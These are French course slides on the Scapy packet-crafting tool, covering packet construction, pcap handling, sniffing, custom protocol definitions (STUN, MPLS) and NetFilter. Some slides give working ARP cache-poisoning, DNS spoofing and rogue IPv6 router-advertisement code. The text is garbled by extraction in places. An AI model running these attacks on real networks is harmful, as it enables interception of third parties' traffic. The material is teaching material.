8.1 Scapy : structure des objets & empilement de couches
31
Dans Scapy, il est possible de choisir les valeurs des diffrents champs comme on le veut mme si cela est
contraire aux protocoles.
Le but tant soit ltude des consquences, soit la ralisation de consquences plus ou moins dsastreuses
pour le rcepteur. . .
> p=IP()/UDP()
> p
<IP
> p.payload
<UDP
|>
> p[UDP].dport = 22
> p
<IP
dport=ssh |
Il est facile daccder une couche en utilisant laccs par le nom de cette couche : p[UDP] ou bien avec
loprateur in :
> UDP in p
True
> p.haslayer(UDP)
Remarques :
pour obtenir le calcul automatique ou la valeur par dfaut de certains champs qui ont t redfinis, il faut les
effacer : del(p.ttl) ;
loprateur / retourne une copie des paquets utiliss.
Scapy : affichage et comparaison humaine des champs
32
Il est possible de demander un paquet de fournir une reprsentation sous forme de chane
de caractres des valeurs de ses champs, laide de la mthode sprintf :
> p.sprintf("%dst%")
00:58:57:ce:7d:aa
> p.sprintf("%TCP.flags%")
S
> p[IP].flags
2L
> p.sprintf(%IP.flags%)
MF+DF
> MF in p.sprintf(%flags%)
True
Ici, cela permet dobtenir un affichage orient humain des valeurs de drapeaux.
Cela permet galement de simplifier les tests :
> q.sprintf(%TCP.flags%)==S
True
Ici, il nest pas ncessaire de tester la valeur des drapeaux avec leur reprsentation hexadcimale.
9 Scapy et fichier pcap
33
Avec Scapy, il est possible de lire des fichiers de capture de trafic rseau au format pcap
utilis par WireShark :
> a=rdpcap ("STUN.pcap")
> a
<STUN.pcap: TCP:0 UDP:8 ICMP:0 Other:0>
> type(a)
<type instance>
> a[0]
<Ether
dst=00:0c:29:94:e6:26 src=00:0f:b0:55:9b:12 type=0x800 |<IP
version=4L ihl=5L tos=0x0
len=56 id=28922 flags= frag=0L ttl=128 proto=udp chksum=0x575d src=175.16.0.1 dst=192.168.2.164

options=[] |<UDP
sport=20000 dport=3478 len=36 chksum=0x5203 |<Raw
load=\x00\x01\x00\x08&|+
\x88\xdcP\xc9\x08\x90\xdc\xefD\x02\xc3e<\x00\x03\x00\x04\x00\x00\x00\x00 |
> a.__class__
<class scapy.plist.PacketList at 0xa0eed7c>
La lecture du fichier cr un objet PacketList qui peut ensuite est parcouru la manire
dune liste.
On va pouvoir appliquer des oprations de filtrage dessus.
Attention : il est possible deffectuer des oprations la manire des listes standards de Python, comme avec filter(fonction, liste), mais on perd des informations (comme
lheure de capture).
9.1 Les listes de paquets
34
Pour le filtrage, on doit fournir une fonction renvoyant vrai ou faux ; une lambda fonction est le
plus efficace :
> a.filter(lambda p: UDP in p)
<filtered STUN.pcap: TCP:0 UDP:8 ICMP:0 Other:0>
> a.filter(lambda p: TCP in p)
> a.filter(lambda p: p[UDP].sport==3478)
On peut obtenir un rsum de ce qui compose le trafic :

> a.summary ()
Ether / IP / UDP 175.16.0.1:20000 > 164.81.1.4:3478 / Raw
Ether / IP / UDP 192.168.2.164:3478 > 164.81.1.4:20000 / Raw
Ether / IP / UDP 175.16.0.1:20001 > 164.81.1.4:3478 / Raw
Ether / IP / UDP 192.168.2.164:3478 > 164.81.1.4:20001 / Raw
Ether / IP / UDP 175.16.0.1:20002 > 164.81.1.4:3478 / Raw
Ether / IP / UDP 192.168.2.164:3478 > 164.81.1.4:20002 / Raw

Ether / IP / UDP 175.16.0.1:20003 > 164.81.1.4:3478 / Raw
Ether / IP / UDP 192.168.2.164:3478 > 164.81.1.4:20003 / Raw
10 Scapy et lcoute rseau
35
Il est possible dcouter le trafic passant sur un rseau :

> p=sniff(count=5)
> p.show()
0000 Ether / IP / TCP 192.168.0.2:64321 > 202.182.124.193:www FA
0001 Ether / IP / TCP 192.168.0.2:64939 > 164.81.1.61:www FA
0002 Ether / IP / TCP 192.168.0.2:65196 > 164.81.1.69:imaps S
0003 Ether / IP / TCP 192.168.0.2:65196 > 164.81.1.69:imaps A
0004 Ether / IP / TCP 192.168.0.2:65196 > 164.81.1.69:imaps PA / Raw
On remarque que les drapeaux TCP sont indiqus.

Le paramtre count permet de limiter la capture 5 paquets (0 indique sans arrt ).
def traiter_trame(p):
# affichage ou travail sur la trame
sniff(count = 0, prn = lambda p : traiter_trame(p))
Les paramtres :
prn permet de passer une fonction appliquer sur chaque paquet reu ;
lfilter permet de donner une fonction Python de filtrage appliquer lors de la capture ;
filter permet de donner une expression de filtrage avec la syntaxe de tcpdump.
Attention : pour pouvoir sniffer le rseau, il faut lancer scapy ou le programme lutilisant avec
les droits root (sudo python mon_programme.py).
11 Dcomposition et composition de paquets
36
Si lon dispose dun paquet sous sa forme objet, il est possible dobtenir sa composition avec
Scapy :
> p=IP(dst="164.81.1.4")/TCP(dport=53)
> p
<IP
frag=0 proto=tcp dst=164.81.1.4 |<TCP
dport=domain |
> str(p)
E\x00\x00(\x00\x01\x00\x00@\x06\x14\xc4\xc0\xa8\x00\x0e\xa4Q\x01\x04\x00\x14\x005\x00\x00
\x00\x00\x00\x00\x00\x00P\x02 \x00)\x8e\x00\x00
Ou de le dcomposer depuis sa forme brute (chane doctets) :

> g=str(p)
> IP(g)
<IP
version=4L ihl=5L tos=0x0 len=40 id=1 flags= frag=0L ttl=64 proto=tcp chksum=0x14c4
src=192.168.0.14 dst=164.81.1.4 options=[] |<TCP
sport=ftp_data dport=domain seq=0 ack=0 dataofs=5L
reserved=0L flags=S window=8192 chksum=0x298e urgptr=0 |
Certaines valeurs se dfinissent automatiquement :

> p=Ether()/IP()/UDP()/DNS()/DNSQR()
> p
<Ether
type=0x800 |<IP
sport=domain |<DNS
|<DNSQR
|>
Le port 53, ou domain a t dfinie par lempilement dun paquet DNS.
Positionner les options
37
Les options dIP

> IPOption
IPOption
IPOption_RR
IPOption_Address_Extension
IPOption_Router_Alert
IPOption_EOL
IPOption_SDBM
IPOption_LSRR
IPOption_SSRR
IPOption_MTU_Probe
IPOption_Security
IPOption_MTU_Reply
IPOption_Stream_Id
IPOption_NOP
IPOption_Traceroute
Value Name
Reference
- -
0 EOOL
- End of Options List
[RFC791,JBP]
1 NOP
- No Operation
[RFC791,JBP]
130 SEC
- Security
[RFC1108]
131 LSR
- Loose Source Route
[RFC791,JBP]
68 TS
- Time Stamp
[RFC791,JBP]
133 E-SEC - Extended Security
[RFC1108]
7 RR
- Record Route
[RFC791,JBP]
136 SID
- Stream ID
[RFC791,JBP]
137 SSR
- Strict Source Route
[RFC791,JBP]
10 ZSU
- Experimental Measurement
[ZSu]
11 MTUP
- MTU Probe
[RFC1191]*
12 MTUR
- MTU Reply
[RFC1191]*
205 FINN
- Experimental Flow Control
[Finn]
82 TR
- Traceroute
[RFC1393]
147 ADDEXT - Address Extension
[Ullmann IPv7]
148 RTRALT - Router Alert
[RFC2113]
149 SDB
- Selective Directed Broadcast[Graff]
150
- Unassigned (Released 18 October 2005)
151 DPS
- Dynamic Packet State
[Malis]
152 UMP
- Upstream Multicast Pkt. [Farinacci]
25 QS
- Quick-Start
[RFC4782]
Exemple
> IP(options=IPOption_Traceroute())
> sr1(IP(options=[IPOption_Traceroute(originator_ip="1.2.3.4")], ttl=2, dst="google.com")/ICMP())
> ip=IP(src="1.1.1.1", dst="8.8.8.8", options=IPOption(\x83\x03\x10))
Positionner les options
38
Les options de TCP

> TCPOptions
({0: (EOL, None), 1: (NOP, None), 2: (MSS, !H), 3: (WScale, !B),
4: (SAckOK, None), 5: (SAck, !), 8: (Timestamp, !II), 14: (AltChkSum, !BH), 15: (AltChkSumOpt, None)},
{AltChkSum: 14, AltChkSumOpt: 15, SAck: 5, Timestamp: 8, MSS: 2, NOP: 1, WScale: 3, SAckOK: 4, EOL: 0})
Les rechercher dans un paquet

for (nom,valeur) in pkt[TCP].options :
if nom == "WScale" :
print "Trouve !"
Attention
Pour vrifier que les options sont bien positionnes, il faut vrifier que Scapy a bien ajout la fin loption EOL :
> t.options=[(MSS, 1460), (SAckOK, ), (Timestamp, (45653432, 0)), (NOP, None)]
> t
<TCP sport=58636 dport=www seq=2631794892L ack=0 dataofs=10L reserved=0L flags=S window=14600 chksum=0xe643 urgptr=0 options=[(MSS,
1460), (SAckOK, ), (Timestamp, (45653432, 0)), (NOP, None)] |>
> t.options
[(MSS, 1460), (SAckOK, ), (Timestamp, (45653432, 0)), (NOP, None)]
> t.show2()
###[ TCP ]###
sport= 58636
dport= www
seq= 2631794892L
ack= 0
dataofs= 10L
reserved= 0L
flags= S
window= 14600
chksum= 0xe643
urgptr= 0
options= [(MSS, 1460), (SAckOK, ), (Timestamp, (45653432, 0)), (NOP, None), (EOL, None)]
12 Lenvoi de paquets
39
Il existe diffrentes fonctions :

de niveau 2 (couche liaison de donnes) :
sendp(paquet) pour envoyer des trames ;
reponse, non_repondu = srp(paquet) envoi et rception de trames ;

reponse = srp1(paquet) envoi dune trame, obtention dune seule rponse ;
de niveau 3 (couche IP) :
send(paquet) pour envoyer des paquets ;
reponse, non_repondu = sr(paquet) envoi et rception ;
reponse = sr1(paquet) envoi dun paquet, rception dune seule rponse.
Les paquets non_repondu sont importants car ils expriment soit un chec, soit un filtrage. . .
En gnral, les paquets de niveau 2 sont des trames Ether, mais pour des connexions sans
fil, elles peuvent tre de type Dot11.
Les paquets de niveau 3 peuvent tre de type IP, ARP, ICMP, etc.
13 Quelques injections : ARP & DNS
40
On appelle injection lenvoi de paquets non ordinaires. . .

1
2
def arpcachepoison(cible, victime):

"""Prends la place de la victime pour la cible"""
cible_mac = getmacbyip(cible)
p = Ether(dst=cible_mac) /ARP(op="who-has", psrc=victime, pdst=cible)
sendp(p)
Du DNS spoofing :
1
# on va sniffer le rseau sur eth0 et ragir sur des paquets vers ou depuis le port 53
scapy.sniff(iface="eth0",count=1,filter="udp port 53",prn=procPacket)
# on va reprendre des infos prsentes dans le paquet
def procPacket(p):
eth_layer = p.getlayer(Ether)
src_mac, dst_mac = (eth_layer.src, eth_layer.dst)
ip_layer = p.getlayer(IP)
src_ip, dst_ip = (ip_layer.src, ip_layer.dst)
11
udp_layer = p.getlayer(UDP)
12
src_port, dst_port = (udp_layer.sport, udp_layer.dport)
Ici, le paramtre filter est exprim dans la mme syntaxe que celle de loutil TCPdump. On
peut utiliser une lambda fonction Python la place.
13.1 Quelques injections : DNS Suite

1
# on fabrique un nouveau paquet DNS en rponse
d = DNS()
d.id = dns_layer.id
d.qr = 1
d.opcode = 16
d.aa = 0
d.tc = 0
d.rd = 0
#Transaction ID
#1 for Response
d.ra = 1
10
d.z = 8
11
d.rcode = 0
12
d.qdcount = 1
#Question Count
13
d.ancount = 1
#Answer Count
14
d.nscount = 0
#No Name server info
15
d.arcount = 0
#No additional records
16
d.qd = str(dns_layer.qd)
18
# Euh...On met www.google.com pour viter de mal utiliser ce code
19
d.an = DNSRR(rrname="www.google.com.", ttl=330, type="A", rclass="IN", rdata="127.0.0.1")
21
spoofed = Ether(src=dst_mac, dst=src_mac)/IP(src=dst_ip, dst=src_ip)
22
spoofed = spoofed/UDP(sport=dst_port, dport=src_port)/d
23
scapy.sendp(spoofed, iface_hint=src_ip)
41
14 Affichage descriptif dun paquet
42
Soit le paquet suivant :

> a = Ether(src=00:c0:97:b0:d1:e0, dst=00:04:74:c5:01:f0, type=2054)/ARP(hwdst=00:04:74:c5:01:f0,
ptype=2048, hwtype=1, psrc=200.9.44.129, hwlen=6, plen=4, pdst=200.9.41.96,
hwsrc=00:c0:97:b0:d1:e0, op=2)
> a.pdfdump(rep_a.pdf)
Ce qui produit laffichage suivant :

Ethernet
dst
src
type
00:04:74:c5:01:f0
00:c0:97:b0:d1:e0
0x806
ARP
hwtype
ptype
hwlen
plen
op
hwsrc
psrc
hwdst
pdst
0x1
0x800
6
4
is-at
00:c0:97:b0:d1:e0
200.9.44.129
00:04:74:c5:01:f0
200.9.41.96
00 04 74 c5 01 f0 00 c0 97 b0 d1 e0 08 06 00 01
08 00 06 04 00 02 00 c0 97 b0 d1 e0 c8 09 2c 81
00 04 74 c5 01 f0 c8 09 29 60
Remarque : la mthode command permet de rcuprer une chane de commande permettant

de recrer le paquet : a.command(), par exemple.
15 Cration automatique de collection de paquets

Il est possible de construire des paquets en faisant varier la valeur de certains champs :
> l=TCP()
> m=IP()/l
> m[TCP].flags = SA
> m
<IP
frag=0 proto=tcp |<TCP
flags=SA |
> m.ttl=(10,13)
> m
<IP
frag=0 ttl=(10, 13) proto=tcp |<TCP
flags=SA |
> m.payload.dport = [80, 22]

> m
<IP
frag=0 ttl=(10, 13) proto=tcp |<TCP
dport=[www, ssh] flags=SA |
On peut alors obtenir la liste complte des paquets :

> [p for p in m]
[<IP
frag=0 ttl=10 proto=tcp |<TCP
dport=www flags=SA |,
<IP
dport=ssh flags=SA |,
<IP
<IP
<IP
<IP
<IP
<IP
dport=ssh flags=SA |]
43
15.1 Cration de fichier pcap
Scapy permet de crer des fichiers au format pcap , ex. un handshake :

1
#!/usr/bin/python
client, serveur = ("192.168.1.1", "192.168.1.75")
clport, servport = (12346, 80)
# choix aleatoire des numeros de sequence initiaux, ISN
cl_isn, serv_isn = (1954, 5018)
ethservcl, ethclserv = ( Ether()/IP(src=server, dst=client), Ether()/IP(src=client, dst=server))
10
# creation du paquet SYN
11
syn_p = ethclserv/TCP(flags="S", sport=clport, dport=servport, seq=cl_isn)
12
# creation de la reponse SYN-ACK
13
synack_p = ethservcl/TCP(flags="SA", sport=servport, dport=clport, seq=serv_isn, ack=syn_p.ack+1)
14
# creation du ACK final
15
ack_p = ethclserv/TCP(flags="A", sport=clport, dport=servport, seq=syn_p.seq+1, ack=synack_p.seq+1)
17
data = "GET / HTTP/1.1\r\nHost: www.unilim.fr\r\n\r\n"
18
# creation du paquet de donnees
19
get_p = ethclserv/TCP(flags="PA", sport=clport, dport=servport, seq=ack_p.seq, ack=ack_p.ack)/data
21
p_list = [syn_p, synack_p, ack_p, get_p]
22
wrpcap("handshake.pcap", p_list)
44
16 change de paquet de Wireshark vers Scapy
45
Il faut dabord copier le paquet dans Wireshark, en slectionnant loption Bytes

(Offset Hex) .
Puis ensuite, il faut dans Scapy en mode
interactif, en fonction de la nature du paquet :
taper
p=RadioTap(import_hexcap()), ici
pour un paquet WiFi,
ou p=Ether(import_hexcap()) pour
un paquet Ethernet ;
coller le contenu du presse-papier ;
appuyer sur la touche return ;

puis sur la combinaison de touches
CTRL-D .
Pour faire des schmas lgend avec Gnuplot

1
a,b=sr(IP(dst="www.unilim.fr")/TCP(sport=[RandShort()]*100))
gp = Gnuplot.Gnuplot(persist=1)
gp.title("Analyse de la distribution des ISN")
gp.xlabel("Numero paquet")
gp.ylabel("ISN")
gp(set xrange [1:100])
gp(set format y "%.0f")
data=Gnuplot.Data(range(1,101),[x[1].seq for x in a],title="Envoi de SYN",with_="lines")
gp.plot(data)
10
gp.hardcopy(isn_distribution.ps)
Pour obtenir les bornes de lISN :

Analyse de la distribution des ISN
> min([x[1].seq for x in a])
2644000000
Envoi de SYN
2625392796
2642000000
> max([x[1].seq for x in a])
2640000000
2644210715
2638000000
> gp.set_range(yrange,(2625392796,2644210715))
ISN
2636000000
2634000000
2632000000
2630000000
2628000000
2626000000
10
20
30
40
50
60
Numero paquet
70
80
90
100
46
17 Ajout de protocole
47
Scapy connait directement de nombreux protocoles, mais parfois il peut tre ncessaire de lui
ajouter la connaissance dun nouveau protocole.
Pour comprendre comment ajouter un protocole, regardons comment est implmenter un protocole connu :
1
class UDP(Packet):
name = "UDP"
fields_desc = [
ShortEnumField("sport", 53, UDP_SERVICES),
ShortEnumField("dport", 53, UDP_SERVICES),
ShortField("len", None),
XShortField("chksum", None), ]
On voit que lentte UDP est constitue de 4 short : entier sur 16bits (le prfixe X indique
dafficher la valeur du champs en notation hexadcimale).
Il existe de nombreux field disponibles.

Essayons sur un nouveau protocole : le protocole STUN, Session Traversal Utilities for
(NAT) , RFC 5389.
17.1 Description rapide de STUN
http://www.bortzmeyer.org/5389.html
48
17.2 Exemple dajout de protocole : protocole STUN

Format de lentte du paquet STUN, RFC 5389 :
0
1
2
3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|0 0|
STUN Message Type
|
Message Length
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
Magic Cookie
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
|
Transaction ID (96 bits)
|
|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Ce qui donne :
1
name = "STUNPacket"
fields_desc=[ XShortEnumField("Type", 0x0001,
class STUN(Packet):
0x0001 : "Binding Request",
0x0002 : "Shared secret Request",
0x0101 : "Binding Response",
0x0102 : "Shared Secret Response",
0x0111 : "Binding Error Response",
0x0112 : "Shared Secret Error Response"}),
10
FieldLenField("Taille", None, length_of="Attributs", fmt="H"),
11
XIntField("MagicCookie", 0),
12
StrFixedLenField("TransactionID", "1", 12)]
49
Format dun paquet STUN
50
Dans WireShark :
On visualise un trafic dchange du protocole STUN, et on se rend compte quun paquet STUN
peut contenir une liste de sous paquets. . .
17.3 Format dun paquet STUN
51
17.4 Ajout de protocole : les champs de longueur variable
52
Dans limplmentation de certains protocoles, il arrive que la taille dun champ soit dtermine
par la valeur dun autre champ.
Par exemple, un champ taille peut indiquer la taille dun champ de donnes de longueur variable.
Il est alors ncessaire de pouvoir indiquer Scapy :
comment calculer automatiquement la taille partir des donnes dans le cas de la construction dun paquet ;
comment dcouper le paquet en accord avec la taille indique.
Exemple
1
FieldLenField("Taille", None, length_of="Donnees"),
StrLenField("Donnees", "Rien", length_from = lambda pkt: pkt.Taille)
Il est ncessaire de lier les deux champs, ici Taille et Donnees , lors de leur dfinition.
On utilise une lambda fonction pour obtenir et calculer la valeur. Il faut utiliser le mme nom
pour la dfinition du champs et laccs lattribut, ici Taille identifie le champ de longueur.
Largument None utilis comme paramtre de FieldLenField indique quil ny a pas de
valeur par dfaut, mais que cette valeur devra tre calcule automatiquement.
Ajout de protocole : les champs de longueur variable
53
Pour indiquer la taille en octet du champ, utilis pour indiquer la taille dun autre champ, on
peut utiliser largument fmt et indiquer une chane de format comme indiqu dans le module
struct :
1
FieldLenField("Taille", None, length_of="Donnees", fmt="H"),
StrLenField("Donnees", "Rien", length_from = lambda pkt: pkt.Taille)
Il est possible dajuster le champ de longueur variable suivant des tailles diffrentes de mots.
Par exemple, une longueur peut tre exprime en mots de 32 bits :
1
FieldLenField("Taille", None, length_of="Donnees", adjust=lambda pkt,x: (x+1)/4),
Rappel sur le format utilis par struct :
H
unsigned short, c--d sur 16 bits, cest la valeur par dfaut utilise par Scapy
B
unsigned byte, c--d sur 8 bits
I
unsigned int, c--d sur 32 bits
17.5 Ajout de protocole : liens entre couches protocolaires
54
Pour pouvoir calculer la valeur dun champ partir dune couche suprieure, il faut dabord
dfinir un champ pour recevoir la valeur dans la couche courante et ensuite utiliser la mthode
post_build qui permet de modifier le paquet aprs sa construction :
1
class MonPaquet(Packet):
name = "Mon_paquet"
fields_desc= [ ShortField("Type", 0x0001),
4
5
6
7
8
ShortField("Taille", None) ]# la taille dest pas dfinie

def post_build(self, p, pay): # p : paquet, pay : payload ou chargement
if (self.Taille is None) and pay :
p=p[:2] +struct.pack("!H",len(pay)) +p[4:] # on modifie le champ Taille
return p+pay # on retourne len-tte modifie et le chargement
La mthode post_build va tre appele lors de lutilisation effective du paquet ou bien lors
de son affichage dans sa forme finale avec show2().
Comme le paquet peut tre construit avec une valeur choisie par lutilisateur, il faut tester si
cette valeur existe (Ici, avec le test self.Taille is None ).
Il faut galement savoir sil y a bien une couche suprieure, payload avec le test and pay: .
Ajout de protocole : liens entre couches protocolaires
55
Il faut considrer les donnes, le paquet, sur lesquelles on va travailler comme une suite doctets que lon va modifier :
1
2
3
4
def post_build(self, p, pay): # p\,: paquet, pay\,: payload ou chargement

if (self.Taille is None) and pay :
p=p[:2] +struct.pack("!H",len(pay)) +p[4:] # on modifie le champ Taille
return p+pay # on retourne len-tte modifie et le chargement
La mthode do_build reoit 3 arguments : le paquet lui-mme, le paquet sous forme dun
suite doctets, et le chargement qui correspond aux donnes suivantes.
Il faut donc le dcomposer comme une suite doctets en tenant compte des champs
qui ne doivent pas tre modifis, comme ici, le champs Type do la recomposition :
p=p[:2]+. . . +p[4:].
Pour la calcul du champs Taille, on utilise le module struct qui va garantir le format des
donnes : ici un format "!H" pour un entier sur deux octets dans le sens rseau (big-endian).
la fin, ma mthode renvoi la concatnation de len-tte, la couche courante, au chargement,
la couche suprieure : return p+pay.
56
Ici, on a une variation sur les champs de taille variable : un champ liste de paquets de taille
variable.
1
class STUN(Packet):
name = "STUNPacket"
magic_cookie = 0
fields_desc=[ XShortEnumField("Type", 0x0001,
0x0001 : "Binding Request",
0x0002 : "Shared secret Request",
0x0101 : "Binding Response",
0x0102 : "Shared Secret Response",
0x0111 : "Binding Error Response",
10
0x0112 : "Shared Secret Error Response"}),
11
FieldLenField("Taille", None, length_of="Attributs", fmt="H"),
12
XIntField("MagicCookie", 0),
13
StrFixedLenField("TransactionID", "1", 12),
14
PacketListField("Attributs", None, _STUNGuessPayloadClass,
15
length_from=lambda x: x.Taille)]
On verra en TP comment rsoudre les problmes poss. . .
17.7 Ajout de protocole : retour sur les layers. . .
57
La notion de layer ou de couche : Un layer, ou une couche, est similaire des champs,
fields , que lon peut empiler les uns sur les autres.
Par exemple : IP()/UDP()/DNS()
Lintrt ? Pouvoir choisir dempiler diffrents types de couches par dessus une autre couche.
Sur lexemple, on peut ainsi empiler une couche correspondant au protocole DNS sur une
couche correspondant au protocole UDP.
Du point de vue rseaux on parle plutt dencapsulation, mais du point de vue de la construction/analyse de paquet, on parle plus dempilement.
Quelles sont les difficults ?

Les diffrentes couches ne sont pas indpendantes : certains champs dune couche sont associs plus ou moins directement, la couche suprieure.
Sur lexemple prcdent :
. la couche IP doit savoir le type de la couche suprieure (champ protocol de len-tte IP) ;
. la couche UDP : une couche DNS est identifie par un numro de port de destination ou de
provenance associ au protocole UDP, soit le port 53.
17.8 Ajout de protocole : comment aller plus loin ?
58
Problmes pour lanalyse dun paquet :

Lanalyse dun paquet repose sur les diffrentes valeurs prsentes dans une couche pour identifier la couche suprieure (On peut avoir de erreurs danalyse base sur des hypothses errones !).
Il est ainsi possible daccrocher des couches entre elles, en indiquant Scapy comment savoir
sil faut faire ou non le lien :
si on dispose dune classe HTTP, il est possible de faire :
1
bind_layers( TCP, HTTP, sport=80 ) # le champ sport du segment TCP
bind_layers( TCP, HTTP, dport=80 )
il est possible de dfaire les liens mis en place par dfaut :

1
split_layers(UDP, DNS, sport=53) # le champ sport du datagramme UDP
Ici, les liens dpendent de la valeur dun champ de la couche par rapport sa couche suprieure. Sans ce lien, la suite du paquet analyser est indiqu en raw.
Autres liens :
Sur lexemple prcdent, la couche IP doit connaitre la dimension de la couche UDP qui, ellemme, doit connaitre la taille de la couche DNS.
La valeur du champ dune couche peut dpendre de la valeur de la couche suprieure !
59
Le paquet STUN, comme on la vu, peut tre complt par une liste de taille variable (ventuellement nulle) dextension.
On va devoir dfinir un type de paquet pour chacune des extensions possibles du protocole :
1
2
name = "STUN Attribut par defaut"
def guess_payload_class(self, p):
5
7
class STUN_Attribut_defaut(Packet): # une classe anctre
return Padding # Pour faire appel a _STUNGuessPayloadClass

class STUN_Attribut1(STUN_Attribut_defaut):
name = "MAPPED-ADDRESS"
fields_desc = [ ShortField("Type", 0x0001),
10
ShortField("Longueur", 8),
11
ByteField("Vide",0),
12
ByteField("Famille", 0x01),
13
ShortField("Port", 0x0001),
14
IPField("Adresse", "0.0.0.0")]
Ensuite, il va falloir intgrer lensemble de ces types dans lanalyse par Scapy du champs de
type PacketListField.
Lors de la dfinition de ce champ, on peut lui donner une fonction pour le guider
guessPayload.
Exemple dajout de protocole : protocole STUN

1
# Dictionnaire des types de sous paquet
_tlv_cls = { 0x0001: "STUN_Attribut1",
0x0002: "STUN_Attribut2",
...
0x8022: "STUN_Attribut7"
# Cette fonction guide PacketListField, Pour savoir comment analyser
# chacun des sous-paquets
def _STUNGuessPayloadClass(p, **kargs):
10
cls = Raw
11
if len(p) >= 2:
12
# Lire 2 octets du payload
13
# pour obtenir le type du sous paquet
14
t = struct.unpack("!H", p[:2])[0]
15
clsname = _tlv_cls.get(t, "Raw")
16
cls = globals()[clsname]
18
return cls(p, **kargs)
60
17.10 Ajout de protocole : intgration dans Scapy
61
Pour utiliser votre nouveau protocole, vous devez mettre le module qui le dcrit dans un rpertoire particulier accessible par scapy.
Ce rpertoire est dfini par rapport au rpertoire o a t install scapy :
scapy/layers/mon_protocole.py.
Enfin, pour permettre Scapy dutiliser automatiquement votre protocole, il faut lassocier
une information connue du protocole de couche infrieure qui le reoit :
1
bind_layers( TCP, HTTP, sport=80 ) # le champ sport du segment TCP
bind_layers( TCP, HTTP, dport=80 )
Attention : cette approche ne pourrait pas fonctionner dans le cas de notre protocole STUN et
de ses extentions. . .
17.11 Test de lajout du protocole STUN dans Scapy. . .
Dmonstration sur machine :
62
17.12 Ajout de lextension MPLS

1
63
# http://trac.secdev.org/scapy/ticket/31
> execfile("mpls.py")
> p=Ether()/MPLS()/IP()
> p
# scapy.contrib.description = MPLS
# scapy.contrib.status = loads
from scapy.packet import Packet,bind_layers
from scapy.fields import BitField,ByteField
from scapy.layers.l2 import Ether
<Ether
type=0x8847 |<MPLS
|<IP
|>
> p.show()
###[ Ethernet ]###
WARNING: Mac address to reach destination not found. Using broadcast.
dst= ff:ff:ff:ff:ff:ff
src= 00:00:00:00:00:00
type= 0x8847
###[ MPLS ]###
10
class MPLS(Packet):
11
name = "MPLS"
12
fields_desc =
label= 3
cos= 0
s= 1
[ BitField("label", 3, 20),
13
BitField("cos", 0, 3),
14
BitField("s", 1, 1),
15
ByteField("ttl", 0)
ttl= 0
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
17
bind_layers(Ether, MPLS, type=0x8847)
id= 1
18
bind_layers(MPLS, IP)
flags=
frag= 0
ttl= 64
proto= ip
chksum= None
src= 127.0.0.1
dst= 127.0.0.1
\options\
Ajout de lextension MPLS

Ethernet
dst
src
type
ff:ff:ff:ff:ff:ff
00:00:00:00:00:00
0x8847
MPLS
label
cos
s
ttl
3L
0L
1L
0
IP
version
ihl
tos
len
id
flags
frag
ttl
proto
chksum
src
dst
options
TCP
sport
dport
seq
ack
dataofs
reserved
flags
window
chksum
urgptr
options
4L
5L
0x0
40
1
0L
64
tcp
0x7ccd
127.0.0.1
127.0.0.1
[]
ftp data
www
0
0
5L
0L
S
8192
0x917c
0
{}
64
ff
31
00
00
ff
00
01
00
ff
45
7f
50
ff
00
00
02
ff
00
00
20
ff
28
01
00
00
00
00
91
00
01
14
7c
00
00
00
00
00 00 00 88 47 00 00
00 40 06 7c cd 7f 00
50 00 00 00 00 00 00
00
18 Scapy & IPv6
65
Il est possible dans Scapy denvoyer des paquets au format IPv6.

Par exemple, on peut diffuser lannonce dun prfixe rseau global et ladresse du routeur associ lensemble
des postes connects dans le lien local (ventuellement, on peut se mettre en lieu et place de ce routeur. . . ) :
1
sendp(Ether()/IPv6()/ICMPv6ND_RA()/
ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", prefixlen=64)
/ICMPv6NDOptSrcLLAddr(lladdr="00:b0:b0:67:89:AB"), loop=1, inter=3)
Cela fonctionne avec des machines de type Ubuntu ou de type Windows 7 :
Les deux machines ont accept le prfixe diffus par Scapy.
19 Scapy & NetFilter
66
Scapy est formidable

Scapy est un outil :
crit en Python ;
danalyse et de construction de paquet qui est efficace pour :
la cration dun stimulus et la rcupration de la rponse ;
lenvoi de paquets forgs crs la main avec passion ;
sniffer un rseau et ragir la dcouverte dun paquet.
Mais
Il est nest pas adapt au traitement dun flux rapide de paquets, comme celui passant travers un routeur
ou un pont.
Utilisation de NetFilter
Il est possible de laider avec Netfilter :
? NetFilter analyse le flux et slectionne les paquets traiter parmi le flux ;
? NetFilter envoie ces paquets Scapy ;

? Scapy prend en charge ses paquets :
pour faire une analyse ;
pour gnrer une rponse ;
? NetFilter traite les paquets rponses donns par Scapy et les renvoie vers le rseau.
Scapy & NetFilter
67
Le but
Insrer lhte o tourne Scapy sur le chemin de la communication entre la machine cible et le
reste du rseau.
Avertissement
Ce travail est but pdagogique et ne saurait tre utilis sur de vraies communications
entre des personnes existantes ou ayant existes, voire mme carrment insouciantes .
Il est bon de rappeler, galement, quaucun paquet na t bless, ni tu mais que certains
ont pu tre, la rigueur, perdus.
Plus srieusement
Vous ntes pas autoriss intercepter les communications dun tiers.
Scapy & NetFilter
68
Combiner rgles de firewall et NetFilter

Si on travaille sur la machine qui sert de routeur :
REDIRECT : permet de rediriger le paquet en rcrivant sa destination vers le routeur lui-mme. Cela permet de faire
des proxy transparents pour des services hbergs sur le routeur lui-mme
nest valide que pour la table nat et les chanes PREROUTING et OUTPUT
-to-ports : permet dindiquer le port de destination employer
# iptables -t nat -A PREROUTING -s 192.168.0.0 -d 164.81.1.45 -p tcp -dport 80 -j REDIRECT -to-ports 80
Il est possible dintercepter des communications et de les rediriger vers le routeur lui-mme o elles pourront tre
adapte aux besoins de lutilisateur expert. . .
DNAT : permet de faire de la traduction dadresse uniquement sur ladresse de destination, pour par exemple faire du
port forwarding :
nest valable que pour la table nat et les chanes PREROUTING et OUTPUT ;
-to-destination : permet dindiquer par quelle adresse IP il faut remplacer ladresse de destination ;
1
# iptables -t nat -A PREROUTING -p tcp -d 15.45.23.67 -dport 80 -j DNAT
